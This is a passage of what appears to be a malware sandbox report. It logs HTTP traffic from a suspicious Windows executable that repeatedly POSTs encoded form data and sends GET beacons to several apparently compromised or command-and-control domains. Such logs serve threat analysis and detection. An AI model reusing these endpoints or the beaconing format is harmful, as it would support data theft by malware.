                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:10.668983936 CEST | 530 | IN | HTTP/1.1 301 Moved Permanently
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Connection: close
                                  X-Powered-By: PHP/8.3.2
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://novosti-dubai.ru/pczf/?FNPd=vvhIsGWCPluUUYKozwujHRnpBsxhc4873MKwq9aQfmKEHTaouY4bbLMkzLN1D0yMYwsFeTDzET5UctfaR3GvIGUh8HX7yBNnSQfVfxhBU4FjPt5zEeZpSpbIsG6X42DlnYxUoU4=&zdK0d=M8mTZ0xHNd1dPVm


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  37 | 192.168.2.6 | 49743 | 188.114.96.3 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:15.750020027 CEST | 739 | OUT | POST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=Y5shldy9lSOU9MziRaWJQAeTNvPRFuFT2kJsvx6niP4Ujh2Ai9keYhONtC2GZ+KXIb9PdzxVzLskBKSXRfYta/EiQnepPu5z5W/pWj0pTGWIRuzWw8+/yYdFUCczGVNx5PS+KURRQ2cOl7SMU8Ik/m0fIrO08aGL/XJJxiyrwN7Fsb5dn2sZY+RtPNR/sMz04W0+PBxXC8Q2


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  38 | 192.168.2.6 | 49744 | 188.114.96.3 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:18.289376974 CEST | 763 | OUT | POST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=Y5shldy9lSOU9p7iX5uJVgeUCPPRMOEa2kFsvzX8i9sUkDuAw8kefhON/i2PGOKQIbwsdyhVzL4kBP2XQswqbvEkdHevLu5z5W/pWnV0TGOIRb7WxYi8/4dGTCczCVN15PSQKRJ/Q00Ol6iMVtIn1m0ZX7Ps26LgxBET9D3No+7Dpt4H7Fs6KuxvPPJNssze6WM+dW9wNI1VZihjtr3bMFKDCr/oGGMA6Q==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  39 | 192.168.2.6 | 49745 | 188.114.96.3 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:20.823626041 CEST | 1776 | OUT | POST /z48v/ HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.ilodezu.com
                                  Referer: http://www.ilodezu.com/z48v/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  40 | 192.168.2.6 | 49746 | 188.114.96.3 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:23.355711937 CEST | 490 | OUT | GET /z48v/?FNPd=V7EBmqWgiCvSgvqad7SyaCOgC+e4BvQG3ktlhx6lo/cZrGqdjKlpWUio9FOhJOaxZOVNIG538/ROKaWARcsTTcMUAhKYPtR70XL2Xhx4NmC7fpbV6q2t8I9SMzcLGlFD+PeBXEg=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.ilodezu.com
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:25.013010025 CEST | 552 | IN | HTTP/1.1 567 unknown
                                  Date: Thu, 23 May 2024 13:21:24 GMT
                                  Content-Length: 17
                                  Connection: close
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMy6kRZtgXf1dY7qVo0E1Ho7tdMxipi0CHAnKGHFyU11GrxSMRaKQb1k%2FG3zWnX3AHpJ6ah6f%2FYPOwZlBFSCI6l%2BakoiilhK4%2Bj%2BiikAwHfvc19AjJUar5e0dd9FJa00XD8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8885594b7b3ec448-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  Data Ascii: Request too large


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  41 | 192.168.2.6 | 49747 | 194.58.112.174 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:30.227165937 CEST | 736 | OUT | POST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm3AGIADy7gwde2tC6Brozqf+/2UCgPhWUk5YU4K1P3A8qdvI+atndhiQ7zkW0ks2CJANX3UKyXhl9sKBz0ddEnXaoMoEBEp5ypDO0XRundubhYdr5d5L9vBP2Et3dThomd/sl1joalLIr5AdzPUCShiIq/SIhGNoNKByoDg5x7D47iGww9HXTbsok2mHHKAud
                                  May 23, 2024 15:21:30.924962044 CEST | 340 | IN | HTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:30 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  42 | 192.168.2.6 | 49748 | 194.58.112.174 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:32.767630100 CEST | 760 | OUT | POST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm2g2IGgq73gdd5NC6bbp6qfC/2Q6waDyUkdcUqOhPwA8qJ/IBH9nKhiUZzhu0ksSCJB9X0nSxWxkbgqBx69dEnXaoMstWEpxypz+0FwukRObuQ9r5XZL5vBOlEsr7Tjgmd6Ql1wwbqLIt2gcGJEOWmE9Y8jVDYv8QL3zyfT5SpTY5iEoC9nX5ZsQkkxLgF0L+l36l5BMgciEmEdsak1ranw==
                                  May 23, 2024 15:21:33.475075960 CEST | 340 | IN | HTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:33 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  43 | 192.168.2.6 | 49749 | 194.58.112.174 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:35.383677959 CEST | 1773 | OUT | POST /3nn5/ HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.kubanci.ru
                                  Referer: http://www.kubanci.ru/3nn5/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=1Vp+1Fb/v0fm2g2IGgq73gdd5NC6bbp6qfC/2Q6waD6UkoIUppdPxA8qWPIEH9nyhjwdzhzDkuaCIj1X8y+xYxkbu6By0ddrnT/gMoxWEpxypxW0TRukXObhYdr9d5LRvC+1EsfNTwYmdagl2DUb17Iv6AceJEDImEIp8jwWYvYQGAKJJSVk4AJY+jQFzgLIZOMksDWXNVSRnzuN8Awsdig8OZAPqUy10jmgo3gM2v/RIBLn7Ab42pWt6BYqJ4Xy56DYymmnsby1b711xtiifhbzr0MMmISoAyelW40YInZRwr6evTP/EAxMxKC4AbcJmrQ++6kp3oEiWa5avDru5QgW+icEL8MEyshC16gGim1snsSdk3xxv+l/PiP5IC0Zl0HkrhNUdd0HmQ/Qt8CH+bDc16sZCDOWVxUTOrFyRJ/+wr+KExIuHzIuUlkF9HbtRAVa81/8K3kax3sHayOKB5HdlL/jy8DALKfMEv+Bx/oD6TDNC2+CyiPILgyTtDUypqsSHe3FgVaQD3ABx0q6cd6x5Rwxkj1HkXuBoCxuQJuDyMNccICqQVOqtvm7ydxx/gfrT2oAb24k3+ybc1whjD2McWEDXvkVwkMYuecc74/SYU6MAect6dOTEsfgdWPwCJJ7Yf/3ZRRpshRGJeFCpaTqeBsRlwA/qNA+ut89Uc9pbCFHfZVlEJcXpP4QgTSz5oT7mOGShhloDzkNxmrcOqQ8oUSkLWwjGEZ30seGtdts5fPmcAOR19u/nlZng40HfBhQ5gSUD/b8bDcz9wtU4lxLap8JEVgvjRuX4duu0i5nOWY/VUvuNc+1iK0zFx3YMTUiJfj2UEece/Y0kioKjd+rFhkwXMxjVnF9tceTNniWEctFi1g95ZapYw01lg0ZaYoezT32h2Bgmxh28pFKBkl2W+giwnCkWZvt1qR7qveRA8u9SrswX3Wxg9KEtdI9fESp+cb+JLAk0M2q82r1+DyzXNXEbkvoTSW0Dszyu2CP+ZE [TRUNCATED]
                                  May 23, 2024 15:21:36.066885948 CEST | 340 | IN | HTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:35 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  44 | 192.168.2.6 | 49750 | 194.58.112.174 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:37.915666103 CEST | 489 | OUT | GET /3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
                                  Host: www.kubanci.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:38.712148905 CEST | 504 | IN | HTTP/1.1 302 Moved Temporarily
                                  Server: nginx
                                  Date: Thu, 23 May 2024 13:21:38 GMT
                                  Content-Type: text/html
                                  Content-Length: 154
                                  Connection: close
                                  Location: http://kubanci.ru/3nn5/?FNPd=4XBe2xrQoWjnswKLKDm2mj9gze7KON4v3N+j4TaEXCiYldMk5+wT4RAjeLUuWdfkxSJYkkjl9YjcDipJ/nGSZTJn94UV3fFhn0eiHqMCH7NwlCC8Ww2FTOTnO/H4b47QggKeMo0=&zdK0d=M8mTZ0xHNd1dPVm
                                  Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  45 | 192.168.2.6 | 49751 | 5.101.153.149 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:43.953802109 CEST | 763 | OUT | POST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=1F2p+57QxfO+5jRypUIblVcs8ID7Dtgw3VD+quTrvb8oYNB13+EH3XA8UVLQHH98kQLNyn0d4erSQHoetaIhyQcXZvyH122pvjsJszNCU6lPZ6ix+QTV15DCzxN4oSxZ+Lp9DuF/LxNKiaXY793uRI7uACuw46hgC3B92qc2oO3uB3so1iP4qt+mmXgOCrs6skF9iF6xp3oa
                                  May 23, 2024 15:21:44.697736979 CEST | 482 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:44 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  46 | 192.168.2.6 | 49752 | 5.101.153.149 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:47.492356062 CEST | 787 | OUT | POST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=1F2p+57QxfO+5ChyvD8b0FcviYD7Zdg83VP+qqDFopYoYtx1lPEH2XA8b1LVa39NkQH/yj8d4e/SQGYespgigQcVUPyFom2pvjsJs3lkU69PZKSx/zLW7ZDB6RN45Cxd+LpbDrcULy1KiaHY4vfteI7oPiu+0JJqLGw21pMgzMyMABtypRPb49ekmV48CLsQuk99wS2WmDN5r5AZIS/gF4mTud6VcvgCIg==
                                  May 23, 2024 15:21:48.243093967 CEST | 482 | IN | HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:48 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  47 | 192.168.2.6 | 49753 | 5.101.153.149 | 80 | 3152 | C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  May 23, 2024 15:21:50.024755001 CEST | 1800 | OUT | POST /t96c/ HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.dvizhenie-pallet.ru
                                  Referer: http://www.dvizhenie-pallet.ru/t96c/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:50.764741898 CEST  482                IN         HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:50 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Content-Encoding: gzip


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  48          192.168.2.6  49754        5.101.153.149    80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:21:52.561395884 CEST  498                OUT        GET /t96c/?zdK0d=M8mTZ0xHNd1dPVm&FNPd=4HeJ9NLv0sXxrw0DzDAC1WoSlNK9MN8e7k2kqtvkuL0qZpE735Fp+TMdSC/xJF1XoX+msXZD9KWOaF8gkpoi/zU8Ecilk3SCpDE4oxEYJqxSeKyI7QDD26ritGREhwxOgv5PBbM= HTTP/1.1
                                  Host: www.dvizhenie-pallet.ru
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Connection: close
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:21:53.305222988 CEST  486                IN         HTTP/1.1 404 Not Found
                                  Server: nginx-reuseport/1.21.1
                                  Date: Thu, 23 May 2024 13:21:53 GMT
                                  Content-Type: text/html; charset=iso-8859-1
                                  Content-Length: 283
                                  Connection: close
                                  Vary: Accept-Encoding
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.dvizhenie-pallet.ru Port 80</address></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  49          192.168.2.6  49755        92.118.24.161    80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:21:58.470715046 CEST  766                OUT        POST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 209
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=9TjhHbzkd4gL1HKptTeEDwBZ7pj0yVIqZnN+7QTbohIabhY0sF8Ayh6X+BYZsxUTEgMoPG+24M9E6TTPBOP4rFn/0KozWU5G3sqa/GOD70UHaJYw2MdLUixvsFZPIBainW/jZrvcL3rBEq5vkzLL+dOjW4/fgMt40hDFTOSbvfnEdQAglZGmVjYDfMVpMT6yZI4rPtQ2pr+V
                                  May 23, 2024 15:21:59.138900042 CEST  479                IN         HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:00 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  50          192.168.2.6  49756        92.118.24.161    80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:01.008996964 CEST  790                OUT        POST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 233
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  Data Ascii: FNPd=9TjhHbzkd4gLzn6pgSeECQBe+pj0rFIUZnB+7UrxoTsabBo0jk8A1h6XxhYchRUYEgwaPDG24M5E6RbPB93/qVn98qotb05G3sqa/Cnu70MHb6Aw0tdIKyxo81ZPFhamnW/NZqyxL0TBErJvkCLM1dPJYY+HrJAK2S+TM922yozERGB65qGFHz4BfONbMz6YbIArd6cRmfb2dGAlZ3PHIXcohj0OoJ9/Wg==
                                  May 23, 2024 15:22:01.681588888 CEST  479                IN         HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:03 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  51          192.168.2.6  49757        92.118.24.161    80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:03.539709091 CEST  1803               OUT        POST /xaki/ HTTP/1.1
                                  Host: www.szandraromanovics.hu
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                  Accept-Language: en-US,en;q=0.9
                                  Accept-Encoding: gzip, deflate, br
                                  Content-Length: 1245
                                  Cache-Control: max-age=0
                                  Connection: close
                                  Content-Type: application/x-www-form-urlencoded
                                  Origin: http://www.szandraromanovics.hu
                                  Referer: http://www.szandraromanovics.hu/xaki/
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                  May 23, 2024 15:22:04.313246965 CEST  479                IN         HTTP/1.1 404 Not Found
                                  Date: Thu, 23 May 2024 13:22:06 GMT
                                  Server: Apache
                                  Content-Length: 315
                                  Connection: close
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                  Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                  52          192.168.2.6  49758        92.118.24.161    80                3152  C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe
                                  Timestamp                             Bytes transferred  Direction  Data
                                  May 23, 2024 15:22:06.071713924 CEST  499                OUT        GET /xaki/?FNPd=wRLBEujJd4B1pnn0jgbcCD9yzLi5n0gWQHliinLShRQwSVs5kwR/9Eag334lnRUYK0hhQTyk4agd1D3QGuL+jgjAjqkpdV5oyMSY0wmC42s9caEZ6Np2ARJau1ITEDyDk07yXfw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1
